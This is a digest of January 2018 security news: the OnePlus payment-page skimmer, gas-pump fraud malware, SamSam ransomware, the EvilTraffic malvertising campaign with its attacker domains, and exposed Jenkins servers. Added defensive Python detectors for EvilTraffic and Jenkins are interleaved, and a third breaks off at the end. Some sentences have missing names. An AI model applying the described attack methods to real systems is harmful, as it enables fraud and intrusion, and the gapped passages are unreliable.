The improving technology of biometric scanners can be seen in Microsoft’s Windows Hello facial recognition system. In December 2017, researchers demonstrated that specially printed face images could defeat Microsoft’s ‘near infrared’ imaging in Windows 10 versions 1511 and 1607 – but not in the latest 1703 and 1709 versions.

Nevertheless, the continuing discussion over whether biometrics provide an adequate alternative, or addition, to passwords to solve the authentication problem ignores one underlying issue. Regardless of whether authentication is by either or both methods, it is a point-in-time authentication. Neither can ensure that the current user is the originally authenticated user. Current thinking is that this can be best solved by continuous and passive biometric behavioral user monitoring – which, notes Plurilock’s Paterson – has the additional advantage of not requiring any extra hardware.

Behavioral biometrics aggregates a potentially wide range of features that can be gathered passively from each individual user. Some of these have been used by security officers for many years. For example, if the IP address of a local employee suddenly switches to Russia or China, the system can be fairly certain that it is not the legitimate user, and can block further access.

New behavioral biometric applications are adding additional options, such as the user’s keyboard cadence and mouse gestures. How many different ‘biometrics’ are included in such authentication can be tailored to the system being accessed: particularly sensitive areas of the environment can require additional continuous authentication.

It is a new approach that is yet to be proven over time or at scale – but it promises much. If the user is continuously monitored, it reduces the reliance on the initial authentication. This cannot be eliminated, but could be designed to reduce user friction on access. Less strong passwords or more basic fingerprint or face scanners could be used, with the knowledge that any intruder will be immediately recognized by the behavioral biometrics.

It is possible that we are entering a new debate before the old one is settled. It could be that the debate will become one of whether passwords or static biometrics should be paired with continuous behavioral biometrics.

The argument is similar to whether perimeter defenses should be replaced by incident response defenses. In this analogy, static passwords or biometrics are akin to perimeter defenses (anti-virus and firewalls); while behavioral monitoring is akin to network anomaly detection. The answer is the same in each case: you need both defenses, and you need both methods of authentication to remain secure.

“The premise of [static] biometric authentication is a powerful and effective security measure,” summarizes James Romer, EMEA chief security architect at SecureAuth. “But it is important to remember that authentication via facial recognition is not new and that no security measure is a silver bullet. No single authentication technique is beyond the reach of cyber criminals. Devices will be hacked and sensors will be tricked. It is important to layer such technology with adaptive authentication methods, such as IP reputation, phone number fraud prevention capabilities or behavioral biometrics. Effective security depends on layers.”

The bottom line is that authentication is a risk valuation. Individual security officers need to balance the increased friction and cost of multiple layers of authentication, including passwords and/or biometrics plus ongoing behavioral biometrics, against the risk to their own data in their own environment. What might be the right solution for one organization or environment might be the wrong solution for another.


Red Hat Pulls Spectre Patches Due to Instability
22.1.2018 securityweek Vulnerability
Red Hat has decided to pull microcode patches for one variant of the Spectre exploit after users complained that updates had caused their systems to stop booting.

Red Hat was among the first vendors to release mitigations for the CPU attack methods known as Spectre and Meltdown. In addition to kernel updates, users of the Linux distribution have been provided microcode updates that can be applied non-persistently using the microcode_ctl mechanism.

By placing the microcode in /lib/firmware/, the update is applied each time the system boots. However, one of the Spectre mitigations has been causing problems and Red Hat has decided to remove it.

The Meltdown attack relies on one vulnerability tracked as CVE-2017-5754. There are two main variants of the Spectre attack: one uses CVE-2017-5753 (Variant 1) and the other one CVE-2017-5715 (Variant 2).

Red Hat determined that the mitigations included in its microcode_ctl and linux-firmware packages for CVE-2017-5715 have caused problems for some users, which is why the latest versions of these packages do not address this variant of the Spectre exploit.

“Red Hat is no longer providing microcode to address Spectre, variant 2, due to instabilities introduced that are causing customer systems to not boot,” Red Hat said. “The latest microcode_ctl and linux-firmware packages are reverting these unstable microprocessor firmware changes to versions that were known to be stable and well tested, released prior to the Spectre/Meltdown embargo lift date on Jan 3rd.”

Red Hat has advised customers to protect their devices against attacks by obtaining updated microcode provided by CPU vendors as system firmware updates. Unlike microcode applied via the microcode_ctl mechanism, system firmware updates represent a more permanent solution.

The Meltdown and Spectre patches are believed to be effective in protecting against attacks. However, many of the updates have turned out to be unstable, and industrial control systems (ICS) vendors have advised customers not to apply them before conducting thorough tests.

The updates initially released by Microsoft caused some systems using AMD processors to stop booting. Some systems running Ubuntu also failed to boot after Canonical’s first round of updates was installed.

Intel itself said the microcode updates it released in response to Meltdown and Spectre caused some systems to reboot more often. VMware has decided to delay new releases of microcode updates until Intel addresses these problems.


40,000 Potentially Impacted in OnePlus Payment System Hack
22.1.2018 securityweek Incident
Up to 40,000 OnePlus customers may have been impacted after attackers managed to compromise the company’s payment page.

In a Friday post on the OnePlus forums, the Chinese smartphone company confirmed the attack and also revealed that the attackers managed to inject rogue code into its payment page, allowing them to steal credit card information entered by users.

The company launched an investigation last week, after some of its users started complaining about fraudulent transactions occurring on their credit cards following purchases made on oneplus.net.

“We are deeply sorry to announce that we have indeed been attacked, and up to 40k users at oneplus.net may be affected by the incident. We have sent out an email to all possibly affected users,” a company employee said in a forum post.

The malicious script, the employee revealed, was designed to capture and send data directly from the user's browser. The script has been removed, the compromised server quarantined, and relevant system structures have been reinforced, the company says.

All OnePlus users who entered credit card information on the oneplus.net website between mid-November 2017 and January 11, 2018, may be impacted by the breach. The hack happened around the same time OnePlus 5T, the latest flagship smartphone from the Chinese maker, was launched.

Immediately after being alerted to the incident, the company also suspended credit card payments on its website, but continued to support PayPal payments.

The malicious code injected in the payment page was designed to steal credit card information such as card numbers, expiry dates, and security codes that the users would enter on the website during the compromise period.

According to OnePlus, the incident didn’t impact users who paid via a saved credit card. Users who paid via the "Credit Card via PayPal" method and those who used PayPal to pay should not be affected either.

“We cannot apologize enough for letting something like this happen. We are working with our providers and local authorities to better address the incident. We are also working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit,” the OnePlus employee said.

Not only should enterprises assume they have been or will be breached, but savvy consumers should also assume their financial data is bound to be compromised, Tyler Moffitt, Senior Threat Research Analyst at Webroot, pointed out in an emailed statement to SecurityWeek. Thus, Moffitt encourages users to take steps to be warned when unauthorized transactions occur on their accounts.

“Additionally, when online shopping, it is inherently more secure for consumers to use their PayPal accounts than enter their credit card data upon checkout – it is best practice to enter credit card information as rarely as possible. Most merchants have PayPal, Masterpass or Visa Checkout options available, which are more secure payment protocol alternatives,” Moffitt concluded.


Hacker infected pumps at gas-stations in Russia in a profitable fraud scheme
22.1.2018 securityaffairs Hacking

Authorities discovered a fraudulent scheme involving dozens of gas-station employees who installed malicious programs on electronic gas pumps to cheat customers
Russian law enforcement investigated fraudulent activities involving gas-station payment systems.

Authorities discovered a fraudulent scheme involving dozens of gas-station employees who installed malicious programs on electronic gas pumps to trick customers into paying for more fuel than they pumped into their vehicles.

The software let gas-station employees deliver between 3 and 7 percent less fuel than customers paid for.

“At dozens of gas stations owned by the largest oil companies, FSB officers identified malicious computer programs, thanks to which the owners of cars quietly missed the fuel. At times, “underweight” was up to 7% of the amount of gasoline that was being refueled into the tank. Identifying the virus was almost impossible. Their creator and distributor was detained.” reported media outlet Rosbalt.

On Saturday, the Russian Federal Security Service (FSB) arrested the hacker Denis Zayev. The man was charged with the creation of several programs designed for this kind of fraud.

Authorities revealed that the programs were found only on gas stations in the south of the country.

According to the authorities, the man was selling the software to the gas-station employees involved in the fraud scheme. Zayev was sharing profits with the employees; it has been estimated that the fraud allowed the hacker and the employees to earn “hundreds of millions of rubles.”

The malicious software was undetectable by inspectors and oil companies that monitor gasoline inventory remotely.

“At dozens of gas stations, malicious programs were discovered, which made it unnoticeable for customers to undercharge fuel when refueling their cars. A giant scam covered almost the entire south of Russia, “viruses” were found in dozens of gas stations in the Stavropol Territory, Adygea, Krasnodar Territory, Kalmykia, several republics of the North Caucasus, etc.” continues Rosbalt. “A whole network was built to steal fuel from ordinary citizens – they did not bear any financial loss,” the source said.

Zayev’s software consisted of sophisticated programs that were injected both into the pump software and into the cash register to modify records.

Rosbalt provided details about the way the programs worked. Every morning, gas-station employees left one of the reservoirs empty (for example, under the guise of maintenance). When a customer made a purchase, the software automatically shorted him by 3% to 7% of the amount of gasoline purchased. The pump’s meter was instructed to show the customer that the entire volume of paid fuel had been delivered to the tank. The stolen gasoline was automatically routed to the reservoir left empty, and the malware erased any trace of the operation.

The fuel was collected in the tank to be sold later by scammers that shared the profits of the sale.

Vulnerabilities and cyber attacks involving systems at gas-stations are not a novelty.

In January 2014, a criminal organization hit gas station ATMs located in South America. The gang used Bluetooth-enabled skimmers to steal 2 million dollars from customers.

In early 2015, experts at Rapid7 revealed that more than 5,000 automated tank gauges (ATGs) used to prevent fuel leaks at gas stations in the US were vulnerable to remote cyber attacks.


UK Teen Gained Access to CIA Chief's Accounts: Court
22.1.2018 securityweek BigBrothers
A British teenager managed to access the communications accounts of top US intelligence and security officials including the then CIA chief John Brennan, a London court heard Friday.

Kane Gamble, now 18, was aged 15 and 16 when, from his bedroom in Coalville, central England, he managed to impersonate his targets to gain highly sensitive information.

"Kane Gamble gained access to the communications accounts of some very high-ranking US intelligence officials and government employees," prosecutor John Lloyd-Jones told England's Old Bailey central criminal court. "He also gained access to US law enforcement and intelligence agency networks."

Gamble has admitted 10 offences under the Computer Misuse Act, committed between June 2015 and February 2016, and is awaiting sentencing.

The court heard how the teenager founded the group Crackas With Attitude (CWA), which used "social engineering" -- manipulating call centres and help desks into divulging confidential information -- which they then exploited.

Gamble impersonated Brennan in calls to the telecommunications companies Verizon and AOL, although in one attempt, he stumbled on a question about Brennan's first pet.

Several sensitive documents were reportedly obtained from Brennan's private email inbox and Gamble managed to get information about military and intelligence operations in Iran and Afghanistan.

"It also seems he was able to successfully access Mr Brennan's iCloud account," the prosecutor said.

Gamble called AOL and initiated a password reset, and took control of Brennan's wife's iPad.

- 'I own you' -

Gamble also targeted the then US secretary of homeland security Jeh Johnson and made calls to his phone number.

He left Johnson's wife a voicemail saying "Am I scaring you?" and managed to get a message to appear on the family television saying: "I own you".

Other targets included the then US president Barack Obama's deputy national security adviser Avril Haines, his senior science and technology adviser John Holdren, and FBI special agent Amy Hess.

Gamble gained extensive unauthorised access to the US Department of Justice network and was able to access court case files, including files on the Deepwater oil spill.

He boasted that he had a list of all Homeland Security employees.

Gamble gave some of the material he managed to access to WikiLeaks.

He was arrested at his home on February 9 last year at the request of the FBI.

He claimed he was motivated to act out of support for the Palestinians, and due to the United States "killing innocent civilians", the prosecutor said.

Gamble, wearing a black jacket, spoke only to confirm his name, mumbling "yes", and sat in the court next to his mother.

He will be sentenced at a date yet to be fixed.


Kaspersky Files Injunction to Expedite Appeal Against DHS Ban
22.1.2018 securityweek BigBrothers
Kaspersky Lab last week filed a motion for a preliminary injunction as part of its appeal against the U.S. Department of Homeland Security’s decision to ban the company’s products in federal agencies.

Kaspersky’s appeal targets the DHS’s Binding Operational Directive (BOD) 17-01, which the agency issued in September in response to concerns that the company may be aiding Russia’s espionage efforts. President Donald Trump reinforced the ban in mid-December with the National Defense Authorization Act for FY2018.

The security firm filed a lawsuit against the U.S. government shortly after the president signed the bill, arguing that the ban is unconstitutional as it infringes the company’s due process rights. Kaspersky believes the DHS should have given it the opportunity to view the information obtained by the agency before the directive was issued.

“[Kaspersky] has made this filing in hopes that the court will address and resolve the appeal expeditiously in light of the BOD’s damage to the company,” Kaspersky told SecurityWeek.

“The company asserts that the DHS decision is unconstitutional and relied on subjective, non-technical public sources, such as uncorroborated and often anonymously sourced media reports, related claims, and rumors. Furthermore, DHS has failed to provide the company adequate due process to rebut the unsubstantiated allegations underlying the BOD and has not provided any evidence of wrongdoing by the company,” it added.

When it announced the lawsuit, Kaspersky said it had voluntarily reached out to the DHS in July and offered to assist with any investigation into the company and its products. While the agency seemed to appreciate the offer, it did not follow up and instead issued the controversial directive without warning.

The security firm said that while only a relatively small percentage of its revenue comes from the U.S. government, the DHS’s actions have had a negative impact on sales in other sectors, in both the United States and other countries.

The accusations against Kaspersky Lab stem from the connection between Eugene Kaspersky, the company’s founder and CEO, and Russian intelligence.

“Dissuading consumers and businesses in the United States and abroad from using Kaspersky Lab products solely because of its geographic origins and without any credible evidence does not constitute a risk-based approach to cybersecurity and does little to address information security concerns related to government networks,” Mr. Kaspersky said when the appeal was filed.

Kaspersky has attempted to clear its name by launching a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

It has also attempted to provide a logical explanation for accusations that its software had been exploited by Russian hackers to steal data belonging to the U.S. National Security Agency (NSA) from a contractor’s device.


Op EvilTraffic CSE CybSec ZLAB Malware Analysis Report – Exclusive, tens of thousands of compromised sites involved in a new massive malvertising campaign
22.1.2018 securityaffairs Virus

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.
In the last days of 2017, researchers at CSE Cybsec observed threat actors exploiting some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising. The huge malvertising campaign was dubbed EvilTraffic.

The compromised websites involved in the EvilTraffic campaign run various versions of the popular WordPress CMS. Once a website has been compromised, the attackers upload a “zip” file containing all the malicious files. Although the zip file has a different name for each infection, its uncompressed contents always have the same structure. We found some of these archives that had not been used yet, so we analyzed their content.

The malicious files are placed under a directory whose name probably refers to a particular version of the same malware (“vomiu”, “blsnxw”, “yrpowe”, “hkfoeyw”, “aqkei”, “xbiret”, “slvkty”).

Under this folder there are:

a PHP file called “lerbim.php”;
a PHP file with the same name as the parent directory; it initially has a “.suspected” extension and is only later renamed to “.php” by “lerbim.php”;
two directories, called “wtuds” and “sotpie”, containing a series of files.
An example of this structure is shown in the following figure:


The main purpose of the “malware” used in the EvilTraffic campaign is to trigger a redirecting chain through at least two servers which generate advertising traffic.

The file “{malw_name}.php” is the core of the scheme: when a user requests it through the web browser, it redirects the flow first to “caforyn.pw” and then to “hitcpm.com”, which acts as a dispatcher to the different sites registered to this revenue chain.


These sites could be used by the attackers to offer commercial services that aim to increase traffic for their customers, but this traffic is generated illegally by compromising websites. The sites could also host fraudulent pages that push suspicious downloads (e.g. toolbars, browser extensions or fake antivirus) or steal sensitive data (e.g. credit card information).

To increase their visibility on the web, the compromised sites need a good page rank on search engines. So the malware performs SEO poisoning, leveraging wordlists of trending search terms.

Populating the compromised site with the wordlists and their corresponding query results is triggered by contacting the main PHP file with a specific User-Agent on the path “{malw_name}/{malw_name}.php?vm={keyword}”.
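A defender-side check for the on-disk layout and the request pattern just described, added here as an example (not CSE CybSec's own tooling). The file and directory names come from the report; the document root and the access-log lines are constructed, and the infected directory deliberately uses a made-up name so detection rests on the layout rather than the name list.

```python
"""Look for the EvilTraffic on-disk layout and its SEO-poisoning requests."""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Names taken from the report: the dropper, the two data directories and the
# directory names observed so far.
DROPPER_NAME = "lerbim.php"
DATA_DIRS = {"wtuds", "sotpie"}
KNOWN_NAMES = {"vomiu", "blsnxw", "yrpowe", "hkfoeyw", "aqkei", "xbiret", "slvkty"}

# The SEO-poisoning trigger is a request to {name}/{name}.php?vm={keyword},
# i.e. directory and script share one name (the backreference enforces that).
SEO_REQUEST_RE = re.compile(r"/([A-Za-z0-9_-]+)/\1\.php\?vm=")


def inspect_dir(path: Path) -> list[str]:
    """Return the EvilTraffic indicators found directly inside `path`."""
    entries = {p.name for p in path.iterdir()}
    found = []
    if DROPPER_NAME in entries:
        found.append(DROPPER_NAME)
    # The core file carries the parent directory's name, first with a
    # ".suspected" extension and later renamed to ".php" by the dropper.
    for ext in (".suspected", ".php"):
        core = f"{path.name}{ext}"
        if core in entries:
            found.append(core)
    found.extend(sorted(DATA_DIRS & entries))
    if path.name in KNOWN_NAMES:
        found.append("known-dir-name")
    return found


def is_evil_traffic_dir(indicators: list[str]) -> bool:
    """Require two independent indicators to keep false positives down: the
    dropper or the self-named core file, plus a data directory or a known
    directory name (a theme directory may legitimately hold name/name.php)."""
    has_core = any(i == DROPPER_NAME or i.endswith((".php", ".suspected"))
                   for i in indicators)
    has_support = any(i in DATA_DIRS or i == "known-dir-name" for i in indicators)
    return has_core and has_support


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Walk `root` and map each directory matching the layout to its indicators."""
    hits = {}
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            p = Path(dirpath) / d
            indicators = inspect_dir(p)
            if is_evil_traffic_dir(indicators):
                hits[p.relative_to(root).as_posix()] = indicators
    return hits


def find_seo_requests(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (directory name, line) for access-log lines hitting the trigger path."""
    out = []
    for line in log_lines:
        m = SEO_REQUEST_RE.search(line)
        if m:
            out.append((m.group(1), line))
    return out


def build_sample_webroot() -> Path:
    """Create a constructed document root: one infected directory (made-up name)
    and one benign theme directory that merely contains a self-named PHP file."""
    root = Path(tempfile.mkdtemp(prefix="eviltraffic_demo_"))
    infected = root / "wp-content" / "uploads" / "qzrtyk"
    infected.mkdir(parents=True)
    (infected / DROPPER_NAME).write_text("<?php // constructed placeholder\n")
    (infected / "qzrtyk.suspected").write_text("<?php // constructed placeholder\n")
    (infected / "wtuds").mkdir()
    (infected / "sotpie").mkdir()
    benign = root / "wp-content" / "themes" / "mytheme"
    benign.mkdir(parents=True)
    (benign / "mytheme.php").write_text("<?php // legitimate theme file\n")
    return root


# Constructed access-log lines in combined log format.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jan/2018:10:12:01 +0000] "GET /qzrtyk/qzrtyk.php?vm=bitcoin+price HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [05/Jan/2018:10:12:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jan/2018:10:12:09 +0000] "GET /other/thing.php?vm=x HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for rel, ind in scan_webroot(build_sample_webroot()).items():
        print(f"suspicious directory {rel}: {', '.join(ind)}")
    for name, line in find_seo_requests(SAMPLE_LOG):
        print(f"SEO-poisoning trigger for '{name}': {line}")
```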

Researchers from CSE CybSec ZLab discovered roughly 18,100 compromised websites.

While the researchers were analyzing the EvilTraffic malvertising campaign, they realized that most of the compromised websites used in the first weeks of the attacks have been cleaned up in recent days: in just one week, the number of compromised websites dropped from around 35k to 18k.

According to Alexa Traffic Rank, hitcpm.com is ranked number 132 in the world, and 0.2367% of global Internet users visit it. Below are some traffic statistics for hitcpm.com, provided by hypestat.com:

Daily unique visitors: 1,183,500
Monthly unique visitors: 35,505,000
Pages per visit: 1.41
Daily pageviews: 1,668,735
The analysis of the traffic shows an exponential increase in the traffic during October 2017.

Experts discovered that the crooks behind Operation EvilTraffic used malicious software that acts as a browser hijacker to redirect traffic. The malware is distributed via various methods, such as:

Attachments in junk mail
Downloading freeware programs from unreliable sites
Opening torrent files and clicking on malicious links
By playing online games
By visiting compromised websites
The main purpose of the malware is to hijack web browsers by changing settings such as DNS, homepage, etc., in order to redirect as much traffic as possible to the dispatcher site.

Further technical details about this campaign, including IoCs, are available in the report titled:

“Tens of thousands of compromised web sites involved in new massive malvertising campaign”


Google awarded Chinese hacker record $112,500 for Android exploit chain
22.1.2018 securityaffairs Android

Google has awarded a record $112,500 to a security researcher for reporting an exploit chain that could be used to hack Pixel smartphones.
Last week Google disclosed the technical details of the exploit chain, which was devised in August 2017 by Guang Gong of the Alpha Team at Qihoo 360 Technology. The exploit chain triggers two vulnerabilities, CVE-2017-5116 and CVE-2017-14904; the researchers submitted it through the Android Security Rewards (ASR) program.

“The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android’s libgralloc module that is used to escape from Chrome’s sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome.” reads the analysis published by Google.


By chaining the vulnerabilities, attackers can remotely inject arbitrary code into the system_server process when a malicious URL is accessed in Chrome.

In an attack scenario, victims can be tricked into clicking such a URL, allowing the attackers to fully compromise their mobile device.

Gong was awarded $105,000 for this exploit chain and also received an additional $7,500 through the Chrome Rewards program.

Google addressed the flaws as part of Android’s December security bulletin, which fixed a total of 42 bugs.

Pixel mobile devices and partner devices using A/B updates will automatically install the security updates that fixed the flaws.

“The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues.” concluded Google.

Total ASR payouts exceed $1.5 million to date, with the top research team earning $300,000 for 118 vulnerability reports.


A hospital victim of a new SamSam Ransomware campaign paid $55,000 ransom
21.1.2018 securityaffairs Ransomware

The Samsam Ransomware made the headlines in the first days of 2018, the malicious code infected systems of some high-profile targets, including a hospital that paid a $55,000 ransom.
The SamSam ransomware is not a new threat: attacks were observed as far back as 2015, and the list of victims, many of them in the healthcare industry, is long.

Among the victims of the SamSam ransomware is MedStar, a non-profit group that manages 10 hospitals in the Baltimore and Washington area. The crooks behind the attack on MedStar requested 45 Bitcoins (about US$18,500) to restore the encrypted files, but the organization refused to pay the ransom because it had backups of the encrypted data.

In April 2016, the FBI issued a confidential urgent “Flash” message to businesses and organizations about the SamSam ransomware. Why is it so dangerous?

Back to the present, the Samsam Ransomware made the headlines in the first days of 2018, the malicious code infected systems of some high-profile targets, including hospitals, an ICS firm, and a city council.

According to Bleeping Computer, the malware was used in attacks against the Hancock Health Hospital and the in Indiana, the , cloud-based EHR (electronic health records) provider , and an unnamed ICS firm in the US.

In one case, managers of the Hancock Health hospital decided to pay the $55,000 ransom.

“Hancock Health paid a $55,000 ransom to hackers to regain access to its computer systems, hospital officials said. Part of the health network had been held hostage since late Thursday, when ransomware locked files including patient medical records.” reported the Greenfield Reporter.

“The hackers targeted more than 1,400 files, the names of every one temporarily changed to “I’m sorry.” They gave the hospital seven days to pay or the files would be permanently encrypted, officials said.”

In at least three attacks, the ransomware locked files and left ransom notes bearing the name “sorry,” a circumstance that suggests an ongoing campaign run by the same threat actor.

The attackers typically scan the Internet for machines with exposed RDP connections, then attempt to break in using brute-force attacks.


“Bleeping Computer has tracked down this ransom note to recent SamSam infections. According to data provided by the ID-Ransomware service, there have been 17 submissions of SamSam-related files to the service in January alone.” continues Bleeping Computer.

Analysis of the Bitcoin address reported in the ransom note shows the crooks have collected nearly 26 Bitcoin (roughly $300,000); the first payment by one of the victims dates back to December 25.


Researchers found misconfigured Jenkins servers leaking sensitive data
21.1.2018 securityaffairs Security

Security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.
The researcher clarified that he did not exploit any vulnerabilities to gain access to the Jenkins servers; he simply analyzed the ones that were open.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server helps developers build, test and deploy their applications; it has more than 133,000 active installations worldwide and more than 1 million users.

The researcher used the Shodan search engine to find Jenkins servers accessible online and discovered roughly 25,000 instances. Analysis of approximately half of them revealed that 10-20% were misconfigured; the researcher then manually analyzed each of those and notified the affected vendors.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.


Tunç also found some Jenkins servers that implemented SAML/OAuth authentication linked to GitHub or Bitbucket but, unfortunately, allowed any GitHub or Bitbucket account to log in rather than only the legitimate owners.

“Misconfigured in this context means any one of the following:

Wide open to the internet with either guest or administrative permissions by default – guest can be just as catastrophic and damaging as having admin rights
The web application was behind a log-in prompt but allowed ‘self-registration’ which granted guest or admin rights
The web application was behind a SAML/OAuth log-in linked to Github or Bitbucket but was misconfigured to allow any Github/Bitbucket account to log-in to Jenkins rather than being locked down to the organisation’s user pool
” wrote the expert in a blog post.
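The three misconfiguration patterns above can be checked offline against a Jenkins controller's own config.xml. The auditor below is an added example, not the researcher's tooling; the element and class names for the core settings (useSecurity, authorizationStrategy, securityRealm, denyAnonymousReadAccess, disableSignup) are those Jenkins writes to $JENKINS_HOME/config.xml, while the GithubAuthorizationStrategy element names are an assumption about the GitHub OAuth plugin's format, and the three config fragments are constructed.

```python
"""Audit a Jenkins $JENKINS_HOME/config.xml for the three exposure patterns."""
from __future__ import annotations

import xml.etree.ElementTree as ET

UNSECURED = "hudson.security.AuthorizationStrategy$Unsecured"
LOGGED_IN = "hudson.security.FullControlOnceLoggedInAuthorizationStrategy"
PRIVATE_REALM = "hudson.security.HudsonPrivateSecurityRealm"
# Assumption: class and element names below are those written by the GitHub
# OAuth plugin; verify them against your own config.xml before relying on them.
GITHUB_STRATEGY = "org.jenkinsci.plugins.GithubAuthorizationStrategy"


def _text(elem: ET.Element | None, path: str) -> str:
    """Lower-cased text of a child element, or "" when it is absent."""
    child = elem.find(path) if elem is not None else None
    return (child.text or "").strip().lower() if child is not None else ""


def audit_jenkins_config(xml_text: str) -> list[str]:
    """Return human-readable findings; an empty list means none of the three
    misconfiguration patterns from the write-up is present."""
    root = ET.fromstring(xml_text)
    findings: list[str] = []
    if _text(root, "useSecurity") != "true":
        findings.append("security disabled: everyone reaching the port is an administrator")
        return findings
    strategy = root.find("authorizationStrategy")
    realm = root.find("securityRealm")
    s_class = strategy.get("class", "") if strategy is not None else ""
    r_class = realm.get("class", "") if realm is not None else ""

    # Pattern 1: wide open to the internet with guest or admin rights.
    if s_class == UNSECURED:
        findings.append("Unsecured authorization strategy: anonymous users have full control")
    elif s_class == LOGGED_IN and _text(strategy, "denyAnonymousReadAccess") != "true":
        # A missing element is treated as "not denied": older releases defaulted to allow.
        findings.append("anonymous read allowed: jobs, configs and console logs visible without login")

    # Pattern 2: a login prompt, but self-registration grants an account to anyone.
    if r_class == PRIVATE_REALM and _text(realm, "disableSignup") != "true":
        findings.append("self-registration enabled: anyone can create an account and log in")

    # Pattern 3: GitHub OAuth login not locked down to the organisation's users.
    if s_class == GITHUB_STRATEGY:
        orgs = strategy.findall("rootACL/organizationNameList/string")
        if not orgs and _text(strategy, "rootACL/authenticatedUserReadPermission") == "true":
            findings.append("GitHub OAuth: any GitHub account gets read access (no organisation restriction)")
    return findings


# Constructed config.xml fragments (a real file also carries an XML declaration
# and many unrelated elements).
WEAK_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>false</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm>
</hudson>"""

# The corrected settings: deny anonymous read and disable sign-up.
HARDENED_CONFIG = WEAK_CONFIG.replace(
    "<denyAnonymousReadAccess>false", "<denyAnonymousReadAccess>true").replace(
    "<disableSignup>false", "<disableSignup>true")

GITHUB_OPEN_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <securityRealm class="org.jenkinsci.plugins.GithubSecurityRealm"/>
  <authorizationStrategy class="org.jenkinsci.plugins.GithubAuthorizationStrategy">
    <rootACL>
      <organizationNameList class="linked-list"/>
      <adminUserNameList class="linked-list"><string>alice</string></adminUserNameList>
      <authenticatedUserReadPermission>true</authenticatedUserReadPermission>
    </rootACL>
  </authorizationStrategy>
</hudson>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG),
                       ("github-open", GITHUB_OPEN_CONFIG)):
        print(label, audit_jenkins_config(cfg) or ["no findings"])
```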

Tunç reported that almost all of the misconfigured instances he analyzed also leaked sensitive information, including credentials for private source code repositories, credentials for deployment environments (e.g. usernames, passwords, private keys and AWS tokens), and job log files that included credentials and other sensitive data.

The researcher also found Google had exposed sensitive tokens on their Jenkins instance, the company promptly solved the problem after being informed via its bug bounty program.

Other instances discovered by the expert belong to major organizations, including:

London’s government-funded transport body Transport for London;
Supermarkets Sainsbury’s and Tesco;
A company that manufactures toys for children;
Credit checking company ClearScore;
Educational publisher Pearson;
Newspaper publisher News UK.
“It’s 2018 and most organisations don’t have the most basic of responsible disclosure processes in place. Surprisingly (or not) big names fall foul of this problem too.” concluded the researcher.

“If you work in InfoSec or are responsible for the security of your infrastructure, now’s a good time to methodically crawl through your infrastructure to ensure you’re not unknowingly exposing sensitive interfaces to the internet. It only takes one misconfigured instance to destroy your business.”


OnePlus admitted hackers stole credit card information belonging to up to 40,000 customers
21.1.2018 securityaffairs Incident

OnePlus confirmed that a security breach affected its online payment system, hackers stole credit card information belonging to up to 40,000 customers.
OnePlus confirmed that a security breach affected its online payment system, a few days ago many customers of the Chinese smartphone manufacturer claimed to have been the victim of fraudulent credit card transactions after making purchases on the company web store.

OnePlus has finally confirmed that its online payment system was breached, following several complaints from customers who made purchases on the company’s official website.
Dozens of cases were reported through the and on , the circumstance that credit cards had been compromised after customers bought a smartphone or some accessories from the OnePlus official website suggests it was compromised by attackers.

On January 19, the company released a statement to admit the theft of credit card information belonging to up to 40,000 customers. The hacker stole the credit card information between mid-November 2017 and January 11, 2018 by injecting a malicious script into the payment page code.

The script was used by attackers to sniff out credit card information while it was being entered by the users purchasing on the web store.

“We are deeply sorry to announce that we have indeed been attacked, and up to 40k users at oneplus.net may be affected by the incident. We have sent out an email to all possibly affected users.” reads the statement.
“One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered. The malicious script operated intermittently, capturing and sending data directly from the user’s browser. It has since been eliminated.”

OnePlus is still investigating the breach to determine how the attackers injected the malicious script into its servers.

The script was used to sniff out full credit card information, including card numbers, expiry dates, and security codes, directly from a customer’s browser window.
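To the browser, a skimmer injected into a checkout page is just one more script tag, which is why it can run for weeks without anyone noticing. One deployment-time check that catches this class of tampering is to inventory every script on the served payment page and compare it against a signed-off baseline, hashing inline bodies the same way a CSP `script-src` hash allowlist does. The following is an added example, not OnePlus code; the HTML pages, the baseline and the injected marker script are all constructed for illustration:

```python
"""Baseline check for scripts on a checkout page (added example, not OnePlus code).

A skimmer injected into a payment page is, to the browser, just one more
<script>. Inventorying every script on the served page and diffing it against a
known-good baseline flags an unexpected inline script or script src before
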